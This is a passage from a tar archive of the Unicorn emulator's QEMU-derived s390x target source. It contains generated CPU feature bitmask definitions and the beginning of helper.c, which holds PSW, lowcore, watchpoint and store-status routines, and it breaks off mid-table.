See " "the COPYING file in the top-level\n * directory.\n" " */\n\n" "#ifndef %s\n#define %s\n", __FILE__, _YEARS, _NAME_H, _NAME_H); print_feature_defs(); print_feature_group_defs(); print_qemu_feature_defs(); print_feature_group_enum_type(); printf("\n#endif\n"); return 0; } �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/s390x/gen-features.h������������������������������������������������������0000664�0000000�0000000�00000034731�14675241067�0021075�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * AUTOMATICALLY GENERATED, DO NOT MODIFY HERE, EDIT * SOURCE FILE "/home/me/projects/qemu/qemu-5.0.1/target/s390x/gen-features.c" INSTEAD. * * Copyright 2016 IBM Corp. * * This work is licensed under the terms of the GNU GPL, version 2 or (at * your option) any later version. See the COPYING file in the top-level * directory. */ #ifndef TARGET_S390X_GEN_FEATURES_H #define TARGET_S390X_GEN_FEATURES_H /* CPU model feature list data */ #define S390_FEAT_LIST_GEN7_GA1_BASE 0x0000000000000003ULL,0xfffffe0000000000ULL,0x0000000000000001ULL,0x0000000000000000ULL,0x0000000000000000ULL #define S390_FEAT_LIST_GEN7_GA1_DEFAULT 0x0000000000000003ULL,0xfffffe0000000000ULL,0x0000000000000001ULL,0x0000000000000000ULL,0x0000000000000000ULL #define S390_FEAT_LIST_GEN7_GA1_FULL 0x0000000000000003ULL,0xfffffe3380000030ULL,0x0000000000000001ULL,0x0000000000000000ULL,0x0000000000000000ULL #define S390_FEAT_LIST_GEN7_GA2_BASE 0x0000000000000003ULL,0xfffffe0000000000ULL,0x0000000000000001ULL,0x0000000000000000ULL,0x0000000000000000ULL #define S390_FEAT_LIST_GEN7_GA2_DEFAULT 0x0000000000000003ULL,0xfffffe0000000000ULL,0x0000000000000001ULL,0x0000000000000000ULL,0x0000000000000000ULL #define S390_FEAT_LIST_GEN7_GA2_FULL 0x0000000000008003ULL,0xfffffe3380000030ULL,0x0000000000000001ULL,0x0000000000000000ULL,0x0000000000000000ULL #define S390_FEAT_LIST_GEN7_GA3_BASE 0x0000000000000003ULL,0xfffffe0000000000ULL,0x0000000000000001ULL,0x0000000000000000ULL,0x0000000000000000ULL #define S390_FEAT_LIST_GEN7_GA3_DEFAULT 0x0000000000000003ULL,0xfffffe0000000000ULL,0x0000000000000001ULL,0x0000000000000000ULL,0x0000000000000000ULL #define S390_FEAT_LIST_GEN7_GA3_FULL 0x0000000000028003ULL,0xfffffe3780000030ULL,0x0000000000000001ULL,0x0000000000000000ULL,0x0000000000000000ULL #define S390_FEAT_LIST_GEN8_GA1_BASE 0x00000000000f8007ULL,0xfffffe0000000000ULL,0x802000e007007001ULL,0x0000000000000000ULL,0x0000000000000000ULL #define S390_FEAT_LIST_GEN8_GA1_DEFAULT 0x00000000000f8007ULL,0xfffffe0000000000ULL,0x802000e007007001ULL,0x0000000000000000ULL,0x0000000000000000ULL #define S390_FEAT_LIST_GEN8_GA1_FULL 0x00000000000f8007ULL,0xfffffe3788800030ULL,0x802000e007007001ULL,0x0000000000000000ULL,0x0000000000000000ULL #define S390_FEAT_LIST_GEN8_GA2_BASE 0x00000000000f8007ULL,0xfffffe0000000000ULL,0x802000e007007001ULL,0x0000000000000000ULL,0x0000000000000000ULL #define S390_FEAT_LIST_GEN8_GA2_DEFAULT 
0x00000000000f8007ULL,0xfffffe0000000000ULL,0x802000e007007001ULL,0x0000000000000000ULL,0x0000000000000000ULL #define S390_FEAT_LIST_GEN8_GA2_FULL 0x00000000000f8007ULL,0xfffffe3788800030ULL,0x802000e007007001ULL,0x0000000000000000ULL,0x0000000000000000ULL #define S390_FEAT_LIST_GEN8_GA3_BASE 0x00000000000f8007ULL,0xfffffe0000000000ULL,0x802000e007007001ULL,0x0000000000000000ULL,0x0000000000000000ULL #define S390_FEAT_LIST_GEN8_GA3_DEFAULT 0x00000000000f8007ULL,0xfffffe0000000000ULL,0x802000e007007001ULL,0x0000000000000000ULL,0x0000000000000000ULL #define S390_FEAT_LIST_GEN8_GA3_FULL 0x00000000002f8027ULL,0xfffffe3788800030ULL,0x802000e007007001ULL,0x0000000000000000ULL,0x0000000000000000ULL #define S390_FEAT_LIST_GEN8_GA4_BASE 0x00000000000f8007ULL,0xfffffe0000000000ULL,0x802000e007007001ULL,0x0000000000000000ULL,0x0000000000000000ULL #define S390_FEAT_LIST_GEN8_GA4_DEFAULT 0x00000000000f8007ULL,0xfffffe0000000000ULL,0x802000e007007001ULL,0x0000000000000000ULL,0x0000000000000000ULL #define S390_FEAT_LIST_GEN8_GA4_FULL 0x00000000002f8027ULL,0xfffffe3788800030ULL,0x802000e007007001ULL,0x0000000000000000ULL,0x0000000000000000ULL #define S390_FEAT_LIST_GEN8_GA5_BASE 0x00000000000f8007ULL,0xfffffe0000000000ULL,0x802000e007007001ULL,0x0000000000000000ULL,0x0000000000000000ULL #define S390_FEAT_LIST_GEN8_GA5_DEFAULT 0x00000000000f8007ULL,0xfffffe0000000000ULL,0x802000e007007001ULL,0x0000000000000000ULL,0x0000000000000000ULL #define S390_FEAT_LIST_GEN8_GA5_FULL 0x00000000002f8027ULL,0xfffffe3788800030ULL,0x802000e007007001ULL,0x0000000000000000ULL,0x0000000000000000ULL #define S390_FEAT_LIST_GEN9_GA1_BASE 0x0000000019ff816fULL,0xfffffe4000000000ULL,0x802000e00700710fULL,0x0000000000000000ULL,0x0000000000000000ULL #define S390_FEAT_LIST_GEN9_GA1_DEFAULT 0x4000000019ff816fULL,0xfffffec000000000ULL,0x806008e04700710fULL,0x0000000000000001ULL,0x0000000000000000ULL #define S390_FEAT_LIST_GEN9_GA1_FULL 0x4000000019ff816fULL,0xfffffef798800030ULL,0x806008e04700710fULL,0x0000000000000001ULL,0x0000000000000000ULL #define S390_FEAT_LIST_GEN9_GA2_BASE 0x0000000019ff816fULL,0xfffffe4000000000ULL,0x802000e00700710fULL,0x0000000000000000ULL,0x0000000000000000ULL #define S390_FEAT_LIST_GEN9_GA2_DEFAULT 0x4000000019ff816fULL,0xfffffec000000000ULL,0x806008e04700710fULL,0x0000000000000001ULL,0x0000000000000000ULL #define S390_FEAT_LIST_GEN9_GA2_FULL 0x400000c07dff816fULL,0xfffffef798800030ULL,0x806008e04700710fULL,0x0000000000000001ULL,0x0000000000000000ULL #define S390_FEAT_LIST_GEN9_GA3_BASE 0x0000000019ff816fULL,0xfffffe4000000000ULL,0x802000e00700710fULL,0x0000000000000000ULL,0x0000000000000000ULL #define S390_FEAT_LIST_GEN9_GA3_DEFAULT 0x4000000019ff816fULL,0xfffffec000000000ULL,0x806008e04700710fULL,0x0000000000000001ULL,0x0000000000000000ULL #define S390_FEAT_LIST_GEN9_GA3_FULL 0x400002c07dff836fULL,0xfffffef798800030ULL,0x806008e04700710fULL,0x0000000000000001ULL,0x0000000000000000ULL #define S390_FEAT_LIST_GEN10_GA1_BASE 0x000003c3ffff836fULL,0xfffffe4000000000ULL,0x802000e00700710fULL,0x0000000000000000ULL,0x0000000000000000ULL #define S390_FEAT_LIST_GEN10_GA1_DEFAULT 0x400003c3ffff83efULL,0xfffffec000000000ULL,0x80e038f1c700710fULL,0x0000000000000003ULL,0x0000000000000000ULL #define S390_FEAT_LIST_GEN10_GA1_FULL 0x400003c3ffff87efULL,0xfffffeffb9800030ULL,0x80e038f1c700710fULL,0x0000000000000003ULL,0x0000000000000000ULL #define S390_FEAT_LIST_GEN10_GA2_BASE 0x000003c3ffff836fULL,0xfffffe4000000000ULL,0x802000e00700710fULL,0x0000000000000000ULL,0x0000000000000000ULL #define 
S390_FEAT_LIST_GEN10_GA2_DEFAULT 0x400003c3ffff83efULL,0xfffffec000000000ULL,0x80e038f1c700710fULL,0x0000000000000003ULL,0x0000000000000000ULL #define S390_FEAT_LIST_GEN10_GA2_FULL 0x400003e3ffff87efULL,0xfffffefff9800030ULL,0x80e038f1c700710fULL,0x0000000000000003ULL,0x0000000000000000ULL #define S390_FEAT_LIST_GEN10_GA3_BASE 0x000003c3ffff836fULL,0xfffffe4000000000ULL,0x802000e00700710fULL,0x0000000000000000ULL,0x0000000000000000ULL #define S390_FEAT_LIST_GEN10_GA3_DEFAULT 0x400003c3ffff83efULL,0xfffffec000000000ULL,0x80e038f1c700710fULL,0x0000000000000003ULL,0x0000000000000000ULL #define S390_FEAT_LIST_GEN10_GA3_FULL 0x400003e3ffff87efULL,0xfffffefff9800031ULL,0x80e1ffffff03f10fULL,0x0000000000003f03ULL,0x0000000000000000ULL #define S390_FEAT_LIST_GEN11_GA1_BASE 0x00010fefffffa36fULL,0xfffffe4000000000ULL,0x802000e00700710fULL,0x0000000000000000ULL,0x0000000000000000ULL #define S390_FEAT_LIST_GEN11_GA1_DEFAULT 0xc0010fefffffb3efULL,0xfffffec000000033ULL,0xc0fffffffffff10fULL,0xfffffffffff83f03ULL,0x000000000000007fULL #define S390_FEAT_LIST_GEN11_GA1_FULL 0xc0010fefffffb7efULL,0xfffffefff9800033ULL,0xc0fffffffffff10fULL,0xfffffffffff83f03ULL,0x000000000000007fULL #define S390_FEAT_LIST_GEN11_GA2_BASE 0x00010fefffffa36fULL,0xfffffe4000000000ULL,0x802000e00700710fULL,0x0000000000000000ULL,0x0000000000000000ULL #define S390_FEAT_LIST_GEN11_GA2_DEFAULT 0xc0010fefffffb3efULL,0xfffffec000000033ULL,0xc0fffffffffff10fULL,0xfffffffffff83f03ULL,0x000000000000007fULL #define S390_FEAT_LIST_GEN11_GA2_FULL 0xc0010fefffffb7efULL,0xfffffefff9800033ULL,0xc0fffffffffff10fULL,0xfffffffffff83f03ULL,0x000000000000007fULL #define S390_FEAT_LIST_GEN12_GA1_BASE 0x0001bfefffffa36fULL,0xfffffe4000000000ULL,0x802000e00700710fULL,0x0000000000000000ULL,0x0000000000000000ULL #define S390_FEAT_LIST_GEN12_GA1_DEFAULT 0xed01ffefffffb3efULL,0xfffffec001000137ULL,0xc0fffffffffff10fULL,0xfffffffffff83f03ULL,0x000000000000007fULL #define S390_FEAT_LIST_GEN12_GA1_FULL 0xff01ffefffffffefULL,0xfffffffff9800137ULL,0xc0fffffffffff10fULL,0xfffffffffff83f03ULL,0x000000000000007fULL #define S390_FEAT_LIST_GEN12_GA2_BASE 0x0001bfefffffa36fULL,0xfffffe4000000000ULL,0x802000e00700710fULL,0x0000000000000000ULL,0x0000000000000000ULL #define S390_FEAT_LIST_GEN12_GA2_DEFAULT 0xed01ffefffffb3efULL,0xfffffec001000137ULL,0xc0fffffffffff10fULL,0xfffffffffff83f03ULL,0x000000000000007fULL #define S390_FEAT_LIST_GEN12_GA2_FULL 0xff09ffefffffffefULL,0xfffffffff9800137ULL,0xc0fffffffffff10fULL,0xfffffffffff83f03ULL,0x000000000000407fULL #define S390_FEAT_LIST_GEN13_GA1_BASE 0x0003bfefffffa36fULL,0xfffffe4000000008ULL,0x802000e00700733fULL,0x0000000000000000ULL,0x0000000000000000ULL #define S390_FEAT_LIST_GEN13_GA1_DEFAULT 0xed0bffefffffb3efULL,0xfffffec00100017fULL,0xc0fffffffffff33fULL,0xfffffffffff83f03ULL,0x000000000000407fULL #define S390_FEAT_LIST_GEN13_GA1_FULL 0xff0bffefffffffefULL,0xfffffffff980017fULL,0xc0fffffffffff33fULL,0xfffffffffff83f03ULL,0x000000000000407fULL #define S390_FEAT_LIST_GEN13_GA2_BASE 0x0003bfefffffa36fULL,0xfffffe4000000008ULL,0x802000e00700733fULL,0x0000000000000000ULL,0x0000000000000000ULL #define S390_FEAT_LIST_GEN13_GA2_DEFAULT 0xed0bffefffffb3efULL,0xfffffec00100017fULL,0xc0fffffffffff33fULL,0xfffffffffff83f03ULL,0x000000000000407fULL #define S390_FEAT_LIST_GEN13_GA2_FULL 0xff0bffefffffffefULL,0xfffffffff980017fULL,0xc0fffffffffff33fULL,0xfffffffffff83f03ULL,0x000000000000407fULL #define S390_FEAT_LIST_GEN14_GA1_BASE 
0x0077bfffffffa36fULL,0xfffffe4000000008ULL,0x802000e00700733fULL,0x0000000000000000ULL,0x0000000000000000ULL #define S390_FEAT_LIST_GEN14_GA1_DEFAULT 0xed7fffffffffb3efULL,0xfffffec001009fffULL,0xffffffffffffffffULL,0xfffffffffff83fffULL,0x00000000007fc07fULL #define S390_FEAT_LIST_GEN14_GA1_FULL 0xff7fffffffffffefULL,0xffffffffffc1ffffULL,0xffffffffffffffffULL,0xfffffffffff83fffULL,0x00000000007fc07fULL #define S390_FEAT_LIST_GEN14_GA2_BASE 0x0077bfffffffa36fULL,0xfffffe4000000008ULL,0x802000e00700733fULL,0x0000000000000000ULL,0x0000000000000000ULL #define S390_FEAT_LIST_GEN14_GA2_DEFAULT 0xed7fffffffffb3efULL,0xfffffec001009fffULL,0xffffffffffffffffULL,0xfffffffffff83fffULL,0x00000000007fc07fULL #define S390_FEAT_LIST_GEN14_GA2_FULL 0xff7fffffffffffefULL,0xffffffffffc1ffffULL,0xffffffffffffffffULL,0xfffffffffff83fffULL,0x00000000007fc07fULL #define S390_FEAT_LIST_GEN15_GA1_BASE 0x00f7bfffffffa16fULL,0xfffffe4000000008ULL,0x802000e00700733fULL,0x0000000000000000ULL,0x0000000000000000ULL #define S390_FEAT_LIST_GEN15_GA1_DEFAULT 0xedffffffffffb1efULL,0xfffffec0017a9fdfULL,0xffffffffffffffffULL,0xffffffffffffffffULL,0x0000783fffffffffULL #define S390_FEAT_LIST_GEN15_GA1_FULL 0xffffffffffffffefULL,0xffffffffffffffffULL,0xffffffffffffffffULL,0xffffffffffffffffULL,0x00007fffffffffffULL /* CPU feature group list data */ #define S390_FEAT_GROUP_LIST_PLO 0x0000000000000000ULL,0xfffffe0000000000ULL,0x0000000000000001ULL,0x0000000000000000ULL,0x0000000000000000ULL #define S390_FEAT_GROUP_LIST_TOD_CLOCK_STEERING 0x0000000008000000ULL,0x0000000000000000ULL,0x000000000000010eULL,0x0000000000000000ULL,0x0000000000000000ULL #define S390_FEAT_GROUP_LIST_GEN13_PTFF 0x0000000000000000ULL,0x0000000000000000ULL,0x0000000000000230ULL,0x0000000000000000ULL,0x0000000000000000ULL #define S390_FEAT_GROUP_LIST_MSA 0x0000000000010000ULL,0x0000000000000000ULL,0x802000e007007000ULL,0x0000000000000000ULL,0x0000000000000000ULL #define S390_FEAT_GROUP_LIST_MSA_EXT_1 0x0000000000000000ULL,0x0000000000000000ULL,0x0040080040000000ULL,0x0000000000000001ULL,0x0000000000000000ULL #define S390_FEAT_GROUP_LIST_MSA_EXT_2 0x0000000000000000ULL,0x0000000000000000ULL,0x0080301180000000ULL,0x0000000000000002ULL,0x0000000000000000ULL #define S390_FEAT_GROUP_LIST_MSA_EXT_3 0x0000000000000000ULL,0x0000000000000001ULL,0x0001c70e38038000ULL,0x0000000000003f00ULL,0x0000000000000000ULL #define S390_FEAT_GROUP_LIST_MSA_EXT_4 0x0000000000000000ULL,0x0000000000000002ULL,0x401e000000fc0000ULL,0xfffffffffff80000ULL,0x000000000000007fULL #define S390_FEAT_GROUP_LIST_MSA_EXT_5 0x0008000000000000ULL,0x0000000000000000ULL,0x0000000000000000ULL,0x0000000000000000ULL,0x0000000000004000ULL #define S390_FEAT_GROUP_LIST_MSA_EXT_6 0x0000000000000000ULL,0x0000000000000000ULL,0x3f00000000000000ULL,0x00000000000000fcULL,0x0000000000000000ULL #define S390_FEAT_GROUP_LIST_MSA_EXT_7 0x0000000000000000ULL,0x0000000000000000ULL,0x0000000000000000ULL,0x0000000000000000ULL,0x0000000000018000ULL #define S390_FEAT_GROUP_LIST_MSA_EXT_8 0x0000000000000000ULL,0x0000000000008000ULL,0x0000000000000000ULL,0x0000000000000000ULL,0x00000000007e0000ULL #define S390_FEAT_GROUP_LIST_MSA_EXT_9 0x0000000000000000ULL,0x0000000000200000ULL,0x0000000000000000ULL,0x0000000000000000ULL,0x0000003fff803f80ULL #define S390_FEAT_GROUP_LIST_MSA_EXT_9_PCKMO 0x0000000000000000ULL,0x0000000000000000ULL,0x0000000000000000ULL,0x000000000007c000ULL,0x0000000000000000ULL #define S390_FEAT_GROUP_LIST_MULTIPLE_EPOCH_PTFF 
0x0000000000000000ULL,0x0000000000000000ULL,0x0000000000000cc0ULL,0x0000000000000000ULL,0x0000000000000000ULL
#define S390_FEAT_GROUP_LIST_ENH_SORT 0x0000000000000000ULL,0x0000000000040000ULL,0x0000000000000000ULL,0x0000000000000000ULL,0x000007c000000000ULL
#define S390_FEAT_GROUP_LIST_DEFLATE_CONVERSION 0x0000000000000000ULL,0x0000000000080000ULL,0x0000000000000000ULL,0x0000000000000000ULL,0x0000780000000000ULL

/* QEMU (CPU model) feature list data */
#define S390_FEAT_LIST_QEMU_V2_11 0x0000000000000003ULL,0xfffffe0000000000ULL,0x0000000000000001ULL,0x0000000000000000ULL,0x0000000000000000ULL
#define S390_FEAT_LIST_QEMU_V3_1 0x1801a463f5b7814fULL,0xfffffe0000000003ULL,0x0000000000000001ULL,0x0000000000000000ULL,0x0000000000000000ULL
#define S390_FEAT_LIST_QEMU_V4_0 0x1c01a46bf5b7814fULL,0xfffffe0000000003ULL,0x0000000000000001ULL,0x0000000000000000ULL,0x0000000000000000ULL
#define S390_FEAT_LIST_QEMU_V4_1 0x1c03a46bf5b7814fULL,0xfffffe0000000043ULL,0x0000000000000001ULL,0x0000000000000000ULL,0x0000000000000000ULL
#define S390_FEAT_LIST_QEMU_LATEST 0x9c03a46bf5b7814fULL,0xfffffe0001000143ULL,0x0000000000000001ULL,0x0000000000000000ULL,0x0000000000000000ULL
#define S390_FEAT_LIST_QEMU_MAX 0x9c0ba46bf5b7814fULL,0xfffffe00010001c3ULL,0x0000000000000001ULL,0x0000000000000000ULL,0x0000000000000000ULL

/* CPU feature group enum type */
typedef enum {
    S390_FEAT_GROUP_PLO,
    S390_FEAT_GROUP_TOD_CLOCK_STEERING,
    S390_FEAT_GROUP_GEN13_PTFF,
    S390_FEAT_GROUP_MSA,
    S390_FEAT_GROUP_MSA_EXT_1,
    S390_FEAT_GROUP_MSA_EXT_2,
    S390_FEAT_GROUP_MSA_EXT_3,
    S390_FEAT_GROUP_MSA_EXT_4,
    S390_FEAT_GROUP_MSA_EXT_5,
    S390_FEAT_GROUP_MSA_EXT_6,
    S390_FEAT_GROUP_MSA_EXT_7,
    S390_FEAT_GROUP_MSA_EXT_8,
    S390_FEAT_GROUP_MSA_EXT_9,
    S390_FEAT_GROUP_MSA_EXT_9_PCKMO,
    S390_FEAT_GROUP_MULTIPLE_EPOCH_PTFF,
    S390_FEAT_GROUP_ENH_SORT,
    S390_FEAT_GROUP_DEFLATE_CONVERSION,
    S390_FEAT_GROUP_MAX,
} S390FeatGroup;

#endif

unicorn-2.1.1/qemu/target/s390x/helper.c

/*
 * S/390 helpers
 *
 * Copyright (c) 2009 Ulrich Hecht
 * Copyright (c) 2011 Alexander Graf
 *
 * This library is free software; you can redistribute it and/or
 * modify it under the terms of the GNU Lesser General Public
 * License as published by the Free Software Foundation; either
 * version 2.1 of the License, or (at your option) any later version.
 *
 * This library is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
 * Lesser General Public License for more details.
 *
 * You should have received a copy of the GNU Lesser General Public
 * License along with this library; if not, see <http://www.gnu.org/licenses/>.
*/ #include "qemu/osdep.h" #include "cpu.h" #include "internal.h" #include "qemu/timer.h" #include "hw/s390x/ioinst.h" #include "sysemu/tcg.h" void s390x_tod_timer(void *opaque) { cpu_inject_clock_comparator((S390CPU *) opaque); } void s390x_cpu_timer(void *opaque) { cpu_inject_cpu_timer((S390CPU *) opaque); } hwaddr s390_cpu_get_phys_page_debug(CPUState *cs, vaddr vaddr) { S390CPU *cpu = S390_CPU(cs); CPUS390XState *env = &cpu->env; target_ulong raddr; int prot; uint64_t asc = env->psw.mask & PSW_MASK_ASC; uint64_t tec; /* 31-Bit mode */ if (!(env->psw.mask & PSW_MASK_64)) { vaddr &= 0x7fffffff; } /* We want to read the code (e.g., see what we are single-stepping).*/ if (asc != PSW_ASC_HOME) { asc = PSW_ASC_PRIMARY; } /* * We want to read code even if IEP is active. Use MMU_DATA_LOAD instead * of MMU_INST_FETCH. */ if (mmu_translate(env, vaddr, MMU_DATA_LOAD, asc, &raddr, &prot, &tec)) { return -1; } return raddr; } hwaddr s390_cpu_get_phys_addr_debug(CPUState *cs, vaddr vaddr) { hwaddr phys_addr; target_ulong page; page = vaddr & TARGET_PAGE_MASK; phys_addr = cpu_get_phys_page_debug(cs, page); phys_addr += (vaddr & ~TARGET_PAGE_MASK); return phys_addr; } static inline bool is_special_wait_psw(uint64_t psw_addr) { /* signal quiesce */ return (psw_addr & 0xfffUL) == 0xfffUL; } void s390_handle_wait(S390CPU *cpu) { #if 0 CPUState *cs = CPU(cpu); if (s390_cpu_halt(cpu) == 0) { if (is_special_wait_psw(cpu->env.psw.addr)) { // qemu_system_shutdown_request(SHUTDOWN_CAUSE_GUEST_SHUTDOWN); } else { cpu->env.crash_reason = S390_CRASH_REASON_DISABLED_WAIT; qemu_system_guest_panicked(cpu_get_crash_info(cs)); } } #endif } void load_psw(CPUS390XState *env, uint64_t mask, uint64_t addr) { uint64_t old_mask = env->psw.mask; env->psw.addr = addr; env->psw.mask = mask; env->cc_op = (mask >> 44) & 3; if ((old_mask ^ mask) & PSW_MASK_PER) { s390_cpu_recompute_watchpoints(env_cpu(env)); } if (mask & PSW_MASK_WAIT) { s390_handle_wait(env_archcpu(env)); } } uint64_t get_psw_mask(CPUS390XState *env) { uint64_t r = env->psw.mask; env->cc_op = calc_cc(env, env->cc_op, env->cc_src, env->cc_dst, env->cc_vr); r &= ~PSW_MASK_CC; assert(!(env->cc_op & ~3)); r |= (uint64_t)env->cc_op << 44; return r; } LowCore *cpu_map_lowcore(CPUS390XState *env) { LowCore *lowcore; hwaddr len = sizeof(LowCore); lowcore = cpu_physical_memory_map(env_cpu(env)->as, env->psa, &len, true); if (len < sizeof(LowCore)) { cpu_abort(env_cpu(env), "Could not map lowcore\n"); } return lowcore; } void cpu_unmap_lowcore(CPUS390XState *env, LowCore *lowcore) { cpu_physical_memory_unmap(env_cpu(env)->as, lowcore, sizeof(LowCore), 1, sizeof(LowCore)); } void do_restart_interrupt(CPUS390XState *env) { uint64_t mask, addr; LowCore *lowcore; lowcore = cpu_map_lowcore(env); lowcore->restart_old_psw.mask = cpu_to_be64(get_psw_mask(env)); lowcore->restart_old_psw.addr = cpu_to_be64(env->psw.addr); mask = be64_to_cpu(lowcore->restart_new_psw.mask); addr = be64_to_cpu(lowcore->restart_new_psw.addr); cpu_unmap_lowcore(env, lowcore); env->pending_int &= ~INTERRUPT_RESTART; load_psw(env, mask, addr); } void s390_cpu_recompute_watchpoints(CPUState *cs) { const int wp_flags = BP_CPU | BP_MEM_WRITE | BP_STOP_BEFORE_ACCESS; S390CPU *cpu = S390_CPU(cs); CPUS390XState *env = &cpu->env; /* We are called when the watchpoints have changed. First remove them all. */ cpu_watchpoint_remove_all(cs, BP_CPU); /* Return if PER is not enabled */ if (!(env->psw.mask & PSW_MASK_PER)) { return; } /* Return if storage-alteration event is not enabled. 
*/
    if (!(env->cregs[9] & PER_CR9_EVENT_STORE)) {
        return;
    }

    if (env->cregs[10] == 0 && env->cregs[11] == -1LL) {
        /* We can't create a watchpoint spanning the whole memory range, so
           split it in two parts. */
        cpu_watchpoint_insert(cs, 0, 1ULL << 63, wp_flags, NULL);
        cpu_watchpoint_insert(cs, 1ULL << 63, 1ULL << 63, wp_flags, NULL);
    } else if (env->cregs[10] > env->cregs[11]) {
        /* The address range loops, create two watchpoints. */
        cpu_watchpoint_insert(cs, env->cregs[10], -env->cregs[10],
                              wp_flags, NULL);
        cpu_watchpoint_insert(cs, 0, env->cregs[11] + 1, wp_flags, NULL);
    } else {
        /* Default case, create a single watchpoint. */
        cpu_watchpoint_insert(cs, env->cregs[10],
                              env->cregs[11] - env->cregs[10] + 1,
                              wp_flags, NULL);
    }
}

typedef struct SigpSaveArea {
    uint64_t fprs[16];                       /* 0x0000 */
    uint64_t grs[16];                        /* 0x0080 */
    PSW psw;                                 /* 0x0100 */
    uint8_t pad_0x0110[0x0118 - 0x0110];     /* 0x0110 */
    uint32_t prefix;                         /* 0x0118 */
    uint32_t fpc;                            /* 0x011c */
    uint8_t pad_0x0120[0x0124 - 0x0120];     /* 0x0120 */
    uint32_t todpr;                          /* 0x0124 */
    uint64_t cputm;                          /* 0x0128 */
    uint64_t ckc;                            /* 0x0130 */
    uint8_t pad_0x0138[0x0140 - 0x0138];     /* 0x0138 */
    uint32_t ars[16];                        /* 0x0140 */
    uint64_t crs[16];                        /* 0x0180 */
} SigpSaveArea;
QEMU_BUILD_BUG_ON(sizeof(SigpSaveArea) != 512);

int s390_store_status(S390CPU *cpu, hwaddr addr, bool store_arch)
{
    static const uint8_t ar_id = 1;
    SigpSaveArea *sa;
    hwaddr len = sizeof(*sa);
    int i;

    sa = cpu_physical_memory_map(CPU(cpu)->as, addr, &len, true);
    if (!sa) {
        return -EFAULT;
    }
    if (len != sizeof(*sa)) {
        cpu_physical_memory_unmap(CPU(cpu)->as, sa, len, 1, 0);
        return -EFAULT;
    }

    if (store_arch) {
        cpu_physical_memory_write(CPU(cpu)->as,
                                  offsetof(LowCore, ar_access_id), &ar_id, 1);
    }
    for (i = 0; i < 16; ++i) {
        sa->fprs[i] = cpu_to_be64(*get_freg(&cpu->env, i));
    }
    for (i = 0; i < 16; ++i) {
        sa->grs[i] = cpu_to_be64(cpu->env.regs[i]);
    }
    sa->psw.addr = cpu_to_be64(cpu->env.psw.addr);
    sa->psw.mask = cpu_to_be64(get_psw_mask(&cpu->env));
    sa->prefix = cpu_to_be32(cpu->env.psa);
    sa->fpc = cpu_to_be32(cpu->env.fpc);
    sa->todpr = cpu_to_be32(cpu->env.todpr);
    sa->cputm = cpu_to_be64(cpu->env.cputm);
    sa->ckc = cpu_to_be64(cpu->env.ckc >> 8);
    for (i = 0; i < 16; ++i) {
        sa->ars[i] = cpu_to_be32(cpu->env.aregs[i]);
    }
    for (i = 0; i < 16; ++i) {
        sa->crs[i] = cpu_to_be64(cpu->env.cregs[i]);
    }

    cpu_physical_memory_unmap(CPU(cpu)->as, sa, len, 1, len);
    return 0;
}

typedef struct SigpAdtlSaveArea {
    uint64_t vregs[32][2];                   /* 0x0000 */
    uint8_t pad_0x0200[0x0400 - 0x0200];     /* 0x0200 */
    uint64_t gscb[4];                        /* 0x0400 */
    uint8_t pad_0x0420[0x1000 - 0x0420];     /* 0x0420 */
} SigpAdtlSaveArea;
QEMU_BUILD_BUG_ON(sizeof(SigpAdtlSaveArea) != 4096);

#define ADTL_GS_MIN_SIZE 2048 /* minimal size of adtl save area for GS */
int s390_store_adtl_status(S390CPU *cpu, hwaddr addr, hwaddr len)
{
    SigpAdtlSaveArea *sa;
    hwaddr save = len;
    int i;

    sa = cpu_physical_memory_map(CPU(cpu)->as, addr, &save, true);
    if (!sa) {
        return -EFAULT;
    }
    if (save != len) {
        cpu_physical_memory_unmap(CPU(cpu)->as, sa, len, 1, 0);
        return -EFAULT;
    }

    if (s390_has_feat(cpu->env.uc, S390_FEAT_VECTOR)) {
        for (i = 0; i < 32; i++) {
            sa->vregs[i][0] = cpu_to_be64(cpu->env.vregs[i][0]);
            sa->vregs[i][1] = cpu_to_be64(cpu->env.vregs[i][1]);
        }
    }
    if (s390_has_feat(cpu->env.uc, S390_FEAT_GUARDED_STORAGE) &&
        len >= ADTL_GS_MIN_SIZE) {
        for (i = 0; i < 4; i++) {
            sa->gscb[i] = cpu_to_be64(cpu->env.gscb[i]);
        }
    }

    cpu_physical_memory_unmap(CPU(cpu)->as, sa, len, 1, len);
    return 0;
}

const char *cc_name(enum cc_op cc_op)
{
    static const char * const cc_names[] = {
        [CC_OP_CONST0] = "CC_OP_CONST0",
        [CC_OP_CONST1] = "CC_OP_CONST1",
        [CC_OP_CONST2] = "CC_OP_CONST2",
        [CC_OP_CONST3] = "CC_OP_CONST3",
        [CC_OP_DYNAMIC] = "CC_OP_DYNAMIC",
        [CC_OP_STATIC] = "CC_OP_STATIC",
        [CC_OP_NZ] = "CC_OP_NZ",
        [CC_OP_LTGT_32] = "CC_OP_LTGT_32",
        [CC_OP_LTGT_64] = "CC_OP_LTGT_64",
        [CC_OP_LTUGTU_32] = "CC_OP_LTUGTU_32",
        [CC_OP_LTUGTU_64] = "CC_OP_LTUGTU_64",
        [CC_OP_LTGT0_32] = "CC_OP_LTGT0_32",
        [CC_OP_LTGT0_64] = "CC_OP_LTGT0_64",
        [CC_OP_ADD_64] = "CC_OP_ADD_64",
        [CC_OP_ADDU_64] = "CC_OP_ADDU_64",
        [CC_OP_ADDC_64] = "CC_OP_ADDC_64",
        [CC_OP_SUB_64] = "CC_OP_SUB_64",
        [CC_OP_SUBU_64] = "CC_OP_SUBU_64",
        [CC_OP_SUBB_64] = "CC_OP_SUBB_64",
        [CC_OP_ABS_64] = "CC_OP_ABS_64",
        [CC_OP_NABS_64] = "CC_OP_NABS_64",
        [CC_OP_ADD_32] = "CC_OP_ADD_32",
        [CC_OP_ADDU_32] = "CC_OP_ADDU_32",
        [CC_OP_ADDC_32] = "CC_OP_ADDC_32",
        [CC_OP_SUB_32] = "CC_OP_SUB_32",
        [CC_OP_SUBU_32] = "CC_OP_SUBU_32",
        [CC_OP_SUBB_32] = "CC_OP_SUBB_32",
        [CC_OP_ABS_32] = "CC_OP_ABS_32",
        [CC_OP_NABS_32] = "CC_OP_NABS_32",
        [CC_OP_COMP_32] = "CC_OP_COMP_32",
